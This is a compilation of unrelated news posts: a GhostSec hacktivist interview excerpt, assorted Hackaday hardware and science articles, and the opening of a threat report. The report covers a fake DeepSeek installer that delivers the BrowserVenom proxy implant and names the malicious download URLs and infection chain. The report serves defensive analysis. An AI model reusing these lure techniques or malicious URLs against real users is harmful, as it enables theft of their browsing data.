GhostSec: Spesso si può dire che un hacktivist sia davvero appassionato del suo lavoro, dell’impatto che sta avendo. Lo si può vedere nel modo in cui lavora, parla, pubblica e si presenta. Mentre i criminali informatici o i mercenari hanno come unico scopo il denaro, non si può percepire o percepire la stessa passione in loro. Possono amare l’arte dell’hacking, ma è necessario percepire una vera passione per il cambiamento e l’impatto che producono.

15 RHC – Qual è la motivazione principale che vi spinge ad andare avanti? Il desiderio di impatto, di riconoscimento o l’ideologia?

GhostSec: Crediamo nell’essere la voce di chi non ha voce, l’azione per chi non può agire. E un’ispirazione per chi ha troppa paura di agire. Rappresentiamo qualcosa. Crediamo nel rendere il mondo un posto migliore in generale e le nostre azioni, le nostre pubblicazioni e tutto ciò che rappresentiamo sono in linea con questa convinzione specifica.

16 RHC – Come vengono selezionati i nuovi membri all’interno di GhostSec? Sono coinvolti criteri etici, tecnici o geografici?

GhostSec: Ci sono ovviamente criteri etici e tecnici, anche se nulla è limitato geograficamente.

17 RHC – Nel corso degli anni, l’immagine pubblica di gruppi come il vostro è stata plasmata da articoli, analisi OSINT , rapporti CTI e narrazioni dei media. In molti casi, il confine tra realtà tecnica e percezione pubblica si assottiglia, spesso dando luogo a rappresentazioni parziali o distorte. A vostro avviso, quale ruolo svolgono i media e la comunità della sicurezza informatica nel plasmare la vostra immagine pubblica? Vi riconoscete in ciò che viene detto o ritenete che la narrazione esterna abbia travisato o manipolato la vostra identità?

GhostSec: Condividono le loro opinioni e convinzioni su ciò che sta accadendo o sull’argomento di cui stanno parlando e, naturalmente, hanno il diritto di esprimere ciò che sentono e credono. A volte penso che sia corretto, a volte ho la sensazione che veniamo travisati, anche se in fin dei conti i media sono così, dipende esclusivamente dalla fonte e da ciò che credono e dicono.

18 RHC – Grazie mille per l’intervista. Conduciamo queste conversazioni per aiutare i nostri lettori a comprendere che la sicurezza informatica è un campo altamente tecnico e che per vincere la lotta contro la criminalità informatica dobbiamo essere più forti di voi, che spesso, come è noto, siete un passo avanti a tutti gli altri. C’è qualcosa che vorreste dire ai nostri lettori o alle potenziali vittime delle vostre operazioni?

GhostSec: A tutti coloro che leggono questo, grazie da parte nostra e a chi vuole prendere sul serio la propria sicurezza, iniziate a pensare come un aggressore, investite sul budget e prendetela sul serio, non sottovalutate gli aggressori. A chi pensa che sia impossibile anticipare i tempi o raggiungere i propri obiettivi, ricordate: qualsiasi cosa in cui crediate è realizzabile, purché la perseguiate, qualunque cosa sia!

L'articolo RHC Intervista GhostSec: l’hacktivismo tra le ombre del terrorismo e del conflitto cibernetico proviene da il blog della sicurezza informatica.

We all love combat robotics for its creative problem solving; trying to fit drivetrains and weapon systems in a small and light package is never as simple as it appears to be. When you get to the real lightweights… throw everything you know out the window! [Shoverobotics] saw this as a barrier for getting into the 150g weight class, so he created the combat robotics platform named Project SVRN.

You want 4-wheel drive? It’s got it! Wedge or a Grabber? Of course! Anything else you can imagine? Feel free to add and modify the platform to your heart’s content! Controlled by a Malenki Nano, a receiver and motor controller combo board, the SVRN platform allows anyone to get into fairyweight fights with almost no experience.

With 4 N10 motors giving quick control, the platform acts as an excellent platform for various bot designs. Though the electronics and structure are rather simple, the most important and impressive part of Project SVRN is the detailed documentation for every part of building the bot. You can find and follow the documentation yourself from [Shoverobotics]’s Printables page here!

If you already know every type of coil found in your old Grav-Synthesized Vex-Flux from your Whatsamacallit this might not be needed for you, but many people trying to get into making need a ramp to shoot for the stars. For those needing more technical know-how in combat robotics, check out Kitten Mittens, a bot that uses its weapon for locomotion!

youtube.com/embed/1mmZvLIwh6s?…

hackaday.com/2025/06/11/step-i…

As there is no cure for celiac disease, people must stick to a gluten free diet to remain symptom-free. While this has become easier in recent years, scientists have found some promising results in mice for disabling the disease. [via ScienceAlert]

Since celiac is an auto-immune disorder, finding ways to alter the immune response to gluten is one area of investigation to alleviate the symptoms of the disease. Using a so-called “inverse vaccine,” researchers “engineered regulatory T cells (eT_regs) modified to orthotopically express T cell receptors specific to gluten peptides could quiet gluten-reactive effector T cells.”

The reason these are called “inverse vaccines” is that, unlike a traditional vaccine that turns up the immune response to a given stimuli, this does the opposite. When the scientists tried the technique with transgenic mice, the mice exhibited resistance to the typical effects of the target gluten antigen and a related type on the digestive system. As with much research, there is still a lot of work to do, including testing resistance to other types of gluten and whether there are still long-term deleterious effects on true celiac digestive systems as the transgenic mice only had HLA-DQ2.5 reactivity.

If this sounds vaguely familiar, we covered “inverse vaccines” in more detail previously.

hackaday.com/2025/06/11/hackin…

It’s not quite “bend, fold or mutilate” but this project comes close– it actually manufactures a spring clip for [Super Valid Designs] PETAL light system. In the video (embedded below) you’ll see why this tool was needed: by-hand manufacturing worked for the prototype, but really would not scale.
Two examples of the spring in question, embedded in the 3D printed light socket. There’s another pair you can’t see.
The lights themselves might be worthy of a post, being a modular, open source DMX stage lighting rig. Today though we’re looking at how they are manufactured– specifically how one part is manufactured. With these PETAL lights, the lights slot into a base station, which obviously requires a connection of some sort. [Super Valid Designs] opted for a spring connector, which is super valid.

It’s also a pain to work by hand: spring steel needed to be cut to length, hole punched, and bent into the specific shape required. The hand-made springs always needed adjustment after assembly, too, which is no good when people are giving you money for objects. Even when using a tent-pole spring that comes halfway to meeting their requirements, [Super Valid Designs] was not happy with the workflow.

Enter the press: 3D Printed dies rest inside a spring-loaded housing, performing the required bends. Indeed, they were able to improve the shape of the design thanks to the precision afforded by the die. The cutting step happens concurrently, with the head of a pair of tin snips mounted to the jig, and a punch finishes it off. All of this is actuated with a cheap, bog simple , hand-operated arbor press. What had been tedious minutes of work is reduced to but a moment of lever-pushing.

It great story about scaling and manufacturing that may hopefully inspire others in their projects. Perhaps with further optimization and automation, [Super Valid Designs] may find himself in the market for a modular conveyor belt design.

While this process remains fundamentally manual, we have seen automation in maker-type businesses before, like this coaster-slinging CNC setup. Of course automation doesn’t have to be part of a business model; sometimes it’s nice just to skip a tedious bunch of steps, like when building a star lamp.

youtube.com/embed/Mt4FLgW4n4o?…

hackaday.com/2025/06/11/compou…

They say that if you let a million monkeys type on a million typewriters, they will eventually write the works of Shakespeare. While not quite the same thing [bbenchoff] (why does that sound familiar?), spent some computing cycles to generate random data and, via heuristics, find valid Atari 2600 “games” in the data.

As you might expect, the games aren’t going to be things you want to play all day long. In fact, they are more like demos. However, there are a number of interesting programs, considering they were just randomly generated.

Part of the reason this works is that the Atari has a fairly simple 6502-based CPU, so it is straightforward to evaluate the code, and a complete game fits in 4 K. Still, that means there are, according to [Brian], 10¹⁰¹⁵⁹ possible ROMs. Compare that to about 10⁸⁰ protons in the visible universe, and you start to see the scale of the problem.

To cut down the problem, you need some heuristics you can infer from actual games. For one thing, at least 75% of the first 1K of a ROM should be valid opcodes. It is also easy to identify code that writes to the TV and other I/O devices. Obviously, a program with no I/O isn’t going to be an interesting one.

Some of the heuristics deal with reducing the search space. For example, a valid ROM will have a reset vector in the last two bytes, so it is possible to generate random data and then apply the small number of legal reset vectors.

Why? Do you really need a reason? If you don’t have a 2600 handy, do like [Brian] and use an emulator. We wonder if the setup would ever recreate Tarzan?

hackaday.com/2025/06/11/random…

This week Jonathan and Aaron chat with Ben Meadors and Garth Vander Houwen about Meshtastic! What’s changed since we talked to them last, where is the project going, and what’s coming next? Listen to find out!

• meshtastic.org/
• flasher.meshtastic.org/
• meshtastic.com/

youtube.com/embed/hYm_2iVpN4c?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/06/11/floss-…

The original DOOM is famously portable — any computer made within at least the last two decades, including those in printers, heart monitors, passenger vehicles, and routers is almost guaranteed to have a port of the iconic 1993 shooter. The more modern iterations in the series are a little trickier to port, though. Multi-core processors, discrete graphics cards, and gigabytes of memory are generally needed, and it’ll be a long time before something like an off-the-shelf router has all of these components.

But with a specialized distribution of Debian Linux called Proxmox and a healthy amount of configuration it’s possible to flip this idea on its head: getting a desktop computer capable of playing modern video games to take over the network infrastructure for a LAN instead, all with minimal impact to the overall desktop experience. In effect, it’s possible to have a router that can not only play DOOM but play 2020’s DOOM Eternal, likely with hardware most of us already have on hand.

The key that makes a setup like this work is virtualization. Although modern software makes it seem otherwise, not every piece of software needs an eight-core processor and 32 GB of memory. With that in mind, virtualization software splits modern multi-core processors into groups which can act as if they are independent computers. These virtual computers or virtual machines (VMs) can directly utilize not only groups or single processor cores independently, but reserved portions of memory as well as other hardware like peripherals and disk drives.

Proxmox itself is a version of Debian with a number of tools available that streamline this process, and it installs on PCs in essentially the same way as any other Linux distribution would. Once installed, tools like LXC for containerization, KVM for full-fledged virtual machines, and an intuitive web interface are easily accessed by the user to allow containers and VMs to be quickly set up, deployed, backed up, removed, and even sent to other Proxmox installations.

Desktop to Server

The hardware I’m using for Proxmox is one of two desktop computers that I put together shortly after writing this article. Originally this one was set up as a gaming rig and general-purpose desktop computer running Debian, but with its hardware slowly aging and my router not getting a software update for the last half decade I thought I would just relegate the over-powered ninth-generation Intel Core i7 with 32 GB of RAM to run the OPNsense router operating system on bare metal, while building a more modern desktop to replace it. This was both expensive not only in actual cost but in computer resources as well, so I began investigating ways that I could more efficiently use this aging desktop’s resources. This is where Proxmox comes in.

By installing Proxmox and then allocating four of my eight cores to an OPNsense virtual machine, in theory the desktop could function as a router while having resources leftover for other uses, like demon-slaying. Luckily my motherboard already has two network interfaces, so the connection to a modem and the second out to a LAN could both be accommodated without needing to purchase and install more hardware. But this is where Proxmox’s virtualization tools start to shine. Not only can processor cores and chunks of memory be passed through to VMs directly, but other hardware can be sectioned off and passed through as well.

So I assigned one network card to pass straight through to OPNsense, which connects to my modem and receives an IP address from my ISP like a normal router would. The other network interface stays with the Proxmox host, where it is assigned to an internal network bridge where other VMs get network access. With this setup, all VMs and containers I create on the Proxmox machine can access the LAN through the bridge, and since the second networking card is assigned to this bridge as well, any other physical machines (including my WiFi access point) can access this LAN too.

Not All VMs are Equal

Another excellent virtualization feature that Proxmox makes easily accessible is the idea of “CPU units”. In my setup, having four cores available for a router might seem like overkill, and indeed it is until my network gets fully upgraded to 10 Gigabit Ethernet. Until then, it might seem like these cores are wasted.

However, using CPU units the Proxmox host can assign unused or underutilized cores to other machines on the fly. This also lets a user “over-assign” cores, while the CPU units value acts as a sort of priority list. My ninth-generation Intel Core i7 has eight cores, so in this simple setup I can assign four cores to OPNsense with a very high value for CPU units and then assign six cores to a Debian 12 VM with a lower CPU unit value. This scheduling trick makes it seem as though my eight-core machine is actually a ten-core machine, where the Debian 12 VM can use all six cores unless the OPNsense VM needs them. However, this won’t get around the physical eight-core reality where doing something like playing a resource-intense video game while there’s a large network load, and this reassignment of cores back to the router’s VM could certainly impact performance in-game.
A list of VMs and containers running on Proxmox making up a large portion of my LAN, as well as storage options for my datacenter.
Of course, if I’m going to install DOOM Eternal on my Debian 12 VM, it’s going to need a graphics card and some peripherals as well. Passing through USB devices like a mouse and keyboard is straightforward. Passing through a graphics card isn’t much different, with some caveats.

The motherboard, chipset, and processor must support IOMMU to start. From there, hardware that’s passed through to a VM won’t be available to anything else including the host, so with the graphics card assigned to a VM, the display for the host won’t be available anymore. This can be a problem if something goes wrong with the Proxmox machine and the network at the same time (not out of the question since the router is running in Proxmox too), rendering both the display and the web UI unavailable simultaneously.

To mitigate this, I went into the UEFI settings for the motherboard and set the default display to the integrated Intel graphics card on the i7. When Proxmox boots it’ll grab the integrated graphics card, saving the powerful Radeon card for whichever VM needs it.

At this point I’ve solved my initial set of problems, and effectively have a router that can also play many modern PC games. Most importantly, I haven’t actually spent any money at this point either. But with the ability to over-assign processor cores as well as arbitrarily passing through bits of the computer to various VMs, there’s plenty more that I found for this machine to do besides these two tasks.

Containerized Applications

The ninth-gen Intel isn’t the only machine I have from this era. I also have an eighth-generation machine (with the IME disabled) that had been performing some server duties for me, including network-attached storage (NAS) and media streaming, as well as monitoring an IP security camera system. With my more powerful desktop ready for more VMs I slowly started migrating these services over to Proxmox, freeing the eighth-gen machine for bare-metal tasks largely related to gaming and media. The first thing to migrate was my NAS. Rather than have Debian manage a RAID array and share it over the network on its own, I used Proxmox to spin up a TrueNAS Scale VM. TrueNAS has the benefit of using ZFS as a filesystem, a much more robust setup than the standard ext4 filesystem I use in most of my other Linux installations. I installed two drives in the Proxmox machine, passed them through to this new VM, and then set up my new NAS with a mirrored configuration, making this NAS even more robust than it previously was under Debian.

The next thing to move over were some of my containerized applications. Proxmox doesn’t only support VMs, it has the ability to spin up LXC containers as well. Containers are similar to VMs in that the software they run is isolated from the rest of the machine, but instead of running their own operating system they share the host’s kernel, taking up much less system resources. Proxmox still allows containers to be assigned processor cores and uses the CPU unit priority system as well, so for high-availability containers like Pihole I can assign the same number of CPU units as my OPNsense VM, but for my LXC container running Jelu (book tracking), Navidrome (streaming music), and Vikunja (task lists), I can assign a lower CPU unit value as well as only one or two cores.

The final containerized application I use is Zoneminder, which keeps an eye on a few security cameras at my house. It needs a bit more system resources than any of these other two, and it also gets its own hard drive assigned for storing recordings. Unlike TrueNAS, though, the hard drive isn’t passed through but rather the container mounts a partition that the Proxmox host retains ultimate control over. This allows other containers to see and use it as well.
A summary of my Proxmox installation’s resource utilization. Even with cores over-assigned, it rarely breaks a sweat unless gaming or transferring large files over the LAN.
At this point my Proxmox setup has gotten quite complex for a layperson such as myself, with a hardware or system failure meaning that not only would I lose my desktop computer but also essentially all of my home’s network infrastructure and potentially all of my data as well. But Proxmox also makes keeping backups easy, a system that has saved me many times.

For example, OPNsense once inexplicably failed to boot, and another time a kernel update in TrueNAS Scale caused it to kernel panic on boot. In both cases I was able to simply revert to a prior backup. I have backups scheduled for all of my VMs and containers once a week, and this has saved me many headaches. Of course, it’s handy to have a second computer or external drive for backups, as you wouldn’t want to store them on your virtualized NAS which might end up being the very thing you need to restore.

I do have one final VM to mention too, which is a Windows 10 installation. I essentially spun this up because I was having an impossibly difficult time getting my original version of Starcraft running in Debian and thought that it might be easier on a Windows machine. Proxmox makes it extremely easy to assign a few processor cores and some memory and test something like this out, and it turned to work out incredibly well.

So well, in fact, that I also installed BOINC in the Windows VM and now generally leave this running all the time to take advantage of any underutilized cores on this machine for the greater good when they’re not otherwise in use. BOINC is also notoriously difficult to get running in Debian, especially for those using non-Nvidia GPUs, so at least while Windows 10 is still supported I’ll probably keep this setup going for the long term.

Room for Improvement

There are a few downsides to a Proxmox installation, though. As I mentioned previously, it’s probably not the best practice to keep backups on the same hardware, so if it’s your only physical computer then that’ll take some extra thought. I’ve also had considerable difficulty passing an optical drive through to VMs, which is not nearly as straightforward as passing through other hardware types for reasons which escape me. Additionally, some software doesn’t take well to running on virtualized hardware at all. In the past I have experimented with XMR mining software as a way to benchmark hardware capabilities, and although I never let it run nearly long enough to ever actually mine anything it absolutely will not run at all in a virtualized environment. There are certainly other pieces of software that are similar.

I also had a problem that took a while to solve regarding memory use. Memory can be over-assigned like processor cores, but an important note is that if Proxmox is using ZFS for its storage, as mine does, the host OS will use up an incredibly large amount of memory. In my case, file transfers to or from my TrueNAS VM were causing out-of-memory issues on some of my other VMs, leading to their abrupt termination. I still don’t fully understand this problem and as such it took a bit of time to solve, but I eventually both limited the memory the host was able to use for ZFS as well as doubled the physical memory to 64 GB. This had the downstream effect of improving the performance of my other VMs and containers as well, so it was a win-win at a very minimal cost.

The major downside for most, though, will be gaming. While it’s fully possible to run a respectable gaming rig with a setup similar to mine and play essentially any modern game available, this is only going to work out if none of those games use kernel-level anticheat. Valorant, Fortnite, and Call of Duty are all examples that are likely to either not run at all on a virtualized computer or to get an account flagged for cheating.

There are a number of problems with kernel-level anti-cheat including arguments that they are types of rootkits, that they are attempts to stifle Linux gaming, and that they’re lazy solutions to problems that could easily be solved in other ways, but the fact remains that these games will have to be played on bare metal. Personally I’d just as soon not play them at all for any and all of these reasons, even on non-virtualized machines.

Beat On, Against the Current

The only other thing worth noting is that while Proxmox is free and open-source, there are paid enterprise subscription options available, and it is a bit annoying about reminding the user that this option is available. But that’s minor in the grand scheme of things. For me, the benefits far outweigh these downsides. In fact, I’ve found that using Proxmox has reinvigorated my PC hobby in a new way.

While restoring old Apple laptops is one thing, Proxmox has given me a much deeper understanding of computing hardware in general, as well as made it easy to experiment and fiddle with different pieces of software without worrying that I’ll break my entire system. In a very real way it feels like if I want a new computer, it lets me simply create a virtual one that I am free to experiment with and then throw away if I wish. It also makes fixing mistakes easy. Additionally, most things running on my Proxmox install are more stable, more secure, and make more efficient use of system resources.

It’s saved me a ton of money since I nether had to buy individual machines like routers or a NAS and its drives too, nor have I had to build a brand new gaming computer. In fact, the only money I spent on this was an arguably optional 32 GB memory upgrade, which is pennies compared to having to build a brand new desktop. With all that in mind, I’d recommend experimenting with Proxmox for anyone with a computer or similarly flagging interest in their PC in general, especially if they still occasionally want to rip and tear.

hackaday.com/2025/06/11/networ…

Magnetic tape storage is something many of us will associate with 8-bit microcomputers or 1960s mainframe computers, but it still has a place in the modern data center for long-term backups. It’s likely not to be the first storage tech that would spring to mind when considering a relay computer, but that’s just what [DiPDoT] has done by giving his machine tape storage.

We like this hack, in particular because it’s synchronous. Where the cassette storage of old just had the data stream, this one uses both channels of a stereo cassette deck, one for clock and the other data. It’s encoded as a sequence of tones, which are amplified at playback (by a tube amp, of course) to drive a rectifier which fires the relay.

On the record side the tones are made by an Arduino, something which we fully understand but at the same time can’t help wondering whether something electromechanical could be used instead. Either way, it works well enough to fill a relay shift register with each byte, which can then be transferred to the memory. It’s detailed in a series of videos, the first of which we’ve paced below the break.

If you want more cassette tape goodness, while this may be the slowest, someone else is making a much faster cassette interface.

youtube.com/embed/3r_vtB9umZ4?…

hackaday.com/2025/06/11/this-r…

What happens when you build the largest machine in the world, but it’s still not big enough? That’s the situation the North American transmission system, the grid that connects power plants to substations and the distribution system, and which by some measures is the largest machine ever constructed, finds itself in right now. After more than a century of build-out, the towers and wires that stitch together a continent-sized grid aren’t up to the task they were designed for, and that’s a huge problem for a society with a seemingly insatiable need for more electricity.

There are plenty of reasons for this burgeoning demand, including the rapid growth of data centers to support AI and other cloud services and the move to wind and solar energy as the push to decarbonize the grid proceeds. The former introduces massive new loads to the grid with millions of hungry little GPUs, while the latter increases the supply side, as wind and solar plants are often located out of reach of existing transmission lines. Add in the anticipated expansion of the manufacturing base as industry seeks to re-home factories, and the scale of the potential problem only grows.

The bottom line to all this is that the grid needs to grow to support all this growth, and while there is often no other solution than building new transmission lines, that’s not always feasible. Even when it is, the process can take decades. What’s needed is a quick win, a way to increase the capacity of the existing infrastructure without having to build new lines from the ground up. That’s exactly what reconductoring promises, and the way it gets there presents some interesting engineering challenges and opportunities.

Bare Metal

Copper is probably the first material that comes to mind when thinking about electrical conductors. Copper is the best conductor of electricity after silver, it’s commonly available and relatively easy to extract, and it has all the physical characteristics, such as ductility and tensile strength, that make it easy to form into wire. Copper has become the go-to material for wiring residential and commercial structures, and even in industrial installations, copper wiring is a mainstay.

However, despite its advantages behind the meter, copper is rarely, if ever, used for overhead wiring in transmission and distribution systems. Instead, aluminum is favored for these systems, mainly due to its lower cost compared to the equivalent copper conductor. There’s also the factor of weight; copper is much denser than aluminum, so a transmission system built on copper wires would have to use much sturdier towers and poles to loft the wires. Copper is also much more subject to corrosion than aluminum, an important consideration for wires that will be exposed to the elements for decades.
ACSR (left) has a seven-strand steel core surrounded by 26 aluminum conductors in two layers. ACCC has three layers of trapezoidal wire wrapped around a composite carbon fiber core. Note the vastly denser packing ratio in the ACCC. Source: Dave Bryant, CC BY-SA 3.0.
Aluminum has its downsides, of course. Pure aluminum is only about 61% as conductive as copper, meaning that conductors need to have a larger circular area to carry the same amount of current as a copper cable. Aluminum also has only about half the tensile strength of copper, which would seem to be a problem for wires strung between poles or towers under a lot of tension. However, the greater diameter of aluminum conductors tends to make up for that lack of strength, as does the fact that most aluminum conductors in the transmission system are of composite construction.

The vast majority of the wires in the North American transmission system are composites of aluminum and steel known as ACSR, or aluminum conductor steel-reinforced. ACSR is made by wrapping high-purity aluminum wires around a core of galvanized steel wires. The core can be a single steel wire, but more commonly it’s made from seven strands, six wrapped around a single central wire; especially large ACSR might have a 19-wire core. The core wires are classified by their tensile strength and the thickness of their zinc coating, which determines how corrosion-resistant the core will be.

In standard ACSR, both the steel core and the aluminum outer strands are round in cross-section. Each layer of the cable is twisted in the opposite direction from the previous layer. Alternating the twist of each layer ensures that the finished cable doesn’t have a tendency to coil and kink during installation. In North America, all ACSR is constructed so that the outside layer has a right-hand lay.

ACSR is manufactured by machines called spinning or stranding machines, which have large cylindrical bodies that can carry up to 36 spools of aluminum wire. The wires are fed from the spools into circular spinning plates that collate the wires and spin them around the steel core fed through the center of the machine. The output of one spinning frame can be spooled up as finished ACSR or, if more layers are needed, can pass directly into another spinning frame for another layer of aluminum, in the opposite direction, of course.

youtube.com/embed/TVdOpiER8Xc?…

Fiber to the Core

While ACSR is the backbone of the grid, it’s not the only show in town. There’s an entire beastiary of initialisms based on the materials and methods used to build composite cables. ACSS, or aluminum conductor steel-supported, is similar to ACSR but uses more steel in the core and is completely supported by the steel, as opposed to ACSR where the load is split between the steel and the aluminum. AAAC, or all-aluminum alloy conductor, has no steel in it at all, instead relying on high-strength aluminum alloys for the necessary tensile strength. AAAC has the advantage of being very lightweight as well as being much more resistant to core corrosion than ACSR.

Another approach to reducing core corrosion for aluminum-clad conductors is to switch to composite cores. These are known by various trade names, such as ACCC (aluminum conductor composite core) or ACCR (aluminum conductor composite reinforced). In general, these cables are known as HTLS, which stands for high-temperature, low-sag. They deliver on these twin promises by replacing the traditional steel core with a composite material such as carbon fiber, or in the case of ACCR, a fiber-reinforced metal matrix.

The point of composite cores is to provide the conductor with the necessary tensile strength and lower thermal expansion coefficient, so that heating due to loading and environmental conditions causes the cable to sag less. Controlling sag is critical to cable capacity; the less likely a cable is to sag when heated, the more load it can carry. Additionally, composite cores can have a smaller cross-sectional area than a steel core with the same tensile strength, leaving room for more aluminum in the outer layers while maintaining the same overall conductor diameter. And of course, more aluminum means these advanced conductors can carry more current.

Another way to increase the capacity in advanced conductors is by switching to trapezoidal wires. Traditional ACSR with round wires in the core and conductor layers has a significant amount of dielectric space trapped within the conductor, which contributes nothing to the cable’s current-carrying capacity. Filling those internal voids with aluminum is accomplished by wrapping round composite cores with aluminum wires that have a trapezoidal cross-section to pack tightly against each other. This greatly reduces the dielectric space trapped within a conductor, increasing its ampacity within the same overall diameter.

Unfortunately, trapezoidal aluminum conductors are much harder to manufacture than traditional round wires. While creating the trapezoids isn’t that much harder than drawing round aluminum wire — it really just requires switching to a different die — dealing with non-round wire is more of a challenge. Care must be taken not to twist the wire while it’s being rolled onto its spools, as well as when wrapping the wire onto the core. Also, the different layers of aluminum in the cable require different trapezoidal shapes, lest dielectric voids be introduced. The twist of the different layers of aluminum has to be controlled, too, just as with round wires. Trapezoidal wires can also complicate things for linemen in the field in terms of splicing and terminating cables, although most utilities and cable construction companies have invested in specialized tooling for advanced conductors.

Same Towers, Better Wires

The grid is what it is today in large part because of decisions made a hundred or more years ago, many of which had little to do with engineering. Power plants were located where it made sense to build them relative to the cities and towns they would serve and the availability of the fuel that would power them, while the transmission lines that move bulk power were built where it was possible to obtain rights-of-way. These decisions shaped the physical footprint of the grid, and except in cases where enough forethought was employed to secure rights-of-way generous enough to allow for expansion of the physical plant, that footprint is pretty much what engineers have to work with today.

Increasing the amount of power that can be moved within that limited footprint is what reconductoring is all about. Generally, reconductoring is pretty much what it sounds like: replacing the conductors on existing support structures with advanced conductors. There are certainly cases where reconductoring alone won’t do, such as when new solar or wind plants are built without existing transmission lines to connect them to the system. In those cases, little can be done except to build a new transmission line. And even where reconductoring can be done, it’s not cheap; it can cost 20% more per mile than building new towers on new rights-of-way. But reconductoring is much, much faster than building new lines. A typical reconductoring project can be completed in 18 to 36 months, as compared to the 5 to 15 years needed to build a new line, thanks to all the regulatory and legal challenges involved in obtaining the property to build the structures on. Reconductoring usually faces fewer of these challenges, since rights-of-way on existing lines were established long ago.

The exact methods of reconductoring depend on the specifics of the transmission line, but in general, reconductoring starts with a thorough engineering evaluation of the support structures. Since most advanced conductors are the same weight per unit length as the ACSR they’ll be replacing, loads on the towers should be about the same. But it’s prudent to make sure, and a field inspection of the towers on the line is needed to make sure they’re up to snuff. A careful analysis of the design capacity of the new line is also performed before the project goes through the permitting process. Reconductoring is generally performed on de-energized lines, which means loads have to be temporarily shifted to other lines, requiring careful coordination between utilities and transmission operators.

Once the preliminaries are in place, work begins. Despite how it may appear, most transmission lines are not one long cable per phase that spans dozens of towers across the countryside. Rather, most lines span just a few towers before dead-ending into insulators that use jumpers to carry current across to the next span of cable. This makes reconductoring largely a tower-by-tower affair, which somewhat simplifies the process, especially in terms of maintaining the tension on the towers while the conductors are swapped. Portable tensioning machines are used for that job, as well as for setting the proper tension in the new cable, which determines the sag for that span.

The tooling and methods used to connect advanced conductors to fixtures like midline splices or dead-end adapters are similar to those used for traditional ACSR construction, with allowances made for the switch to composite cores from steel. Hydraulic crimping tools do most of the work of forming a solid mechanical connection between the fixture and the core, and then to the outer aluminum conductors. A collet is also inserted over the core before it’s crimped, to provide additional mechanical strength against pullout.

youtube.com/embed/QD7_7t4SeVY?…

Is all this extra work to manufacture and deploy advanced conductors worth it? In most cases, the answer is a resounding “Yes.” Advanced conductors can often carry twice the current as traditional ACSR or ACCC conductors of the same diameter. To take things even further, advanced AECC, or aluminum-encapsulated carbon core conductors, which use pretensioned carbon fiber cores covered by trapezoidal annealed aluminum conductors, can often triple the ampacity of equivalent-diameter ACSR.

Doubling or trebling the capacity of a line without the need to obtain new rights-of-way or build new structures is a huge win, even when the additional expense is factored in. And given that an estimated 98% of the existing transmission lines in North America are candidates for reconductoring, you can expect to see a lot of activity under your local power lines in the years to come.

hackaday.com/2025/06/11/recond…

As common as uranium is in the ground around us, the world’s oceans contain a thousand times more uranium (~4.5 billion tons) than can be mined today. This makes extracting uranium as well as other resources from seawater a very interesting proposition, albeit it one that requires finding a technological solution to not only filter out these highly diluted substances, but also do so in a way that’s economically viable. Now it seems that Chinese researchers have recently come tantalizingly close to achieving this goal.
The anode chemical reaction to extract uranium. (Credit: Wang et al., Nature Sustainability, 2025)
The used electrochemical method is described in the paper (gift link) by [Yanjing Wang] et al., as published in Nature Sustainability. The claimed recovery cost of up to 100% of the uranium in the seawater is approximately $83/kilogram, which would be much cheaper than previous methods and is within striking distance of current uranium spot prices at about $70 – 85.

Of course, the challenge is to scale up this lab-sized prototype into something more industrial-sized. What’s interesting about this low-voltage method is that the conversion of uranium oxide ions to solid uranium oxides occurs at both the anode and cathode unlike with previous electrochemical methods. The copper anode becomes part of the electrochemical process, with UO₂ deposited on the cathode and U₃O₈ on the anode.

Among the reported performance statistics of this prototype are the ability to extract UO₂²⁺ ions from an NaCl solution at concentrations ranging from 1 – 50 ppm. At 20 ppm and in the presence of Cl^– ions (as is typical in seawater), the extraction rate was about 100%, compared to ~9.1% for the adsorption method. All of this required only a cell voltage of 0.6 V with 50 mA current, while being highly uranium-selective. Copper pollution of the water is also prevented, as the dissolved copper from the anode was found on the cathode after testing.

The process was tested on actual seawater (East & South China Sea), with ten hours of operation resulting in a recovery rate of 100% and 85.3% respectively. With potential electrode optimizations suggested by the authors, this extraction method might prove to be a viable way to not only recover uranium from seawater, but also at uranium mining facilities and more.

hackaday.com/2025/06/11/bipola…

Introduction

DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.

But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install BrowserVenom, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.

Phishing lure

The infection was launched from a phishing site, located at https[:]//deepseek-platform[.]com. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.

Malicious website mimicking DeepSeek

Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the proxy1.php URL path with a “Download now” button. Clicking that results in downloading the malicious installer named AI_Launcher_1.21.exe from the following URL: https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe.

We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.

Malicious installer

The malicious installer AI_Launcher_1.21.exe is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.

The second fake CAPTCHA

This is another fake CAPTCHA that is loaded from https[:]//casoredkff[.]pro/captcha. After the checkbox is ticked, the URL is appended with /success, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.

Two options to install abused LLM frameworks

Clicking either of the “Install” buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: MLInstaller.Runner.Run(). This function triggers the infectious part of the implant.
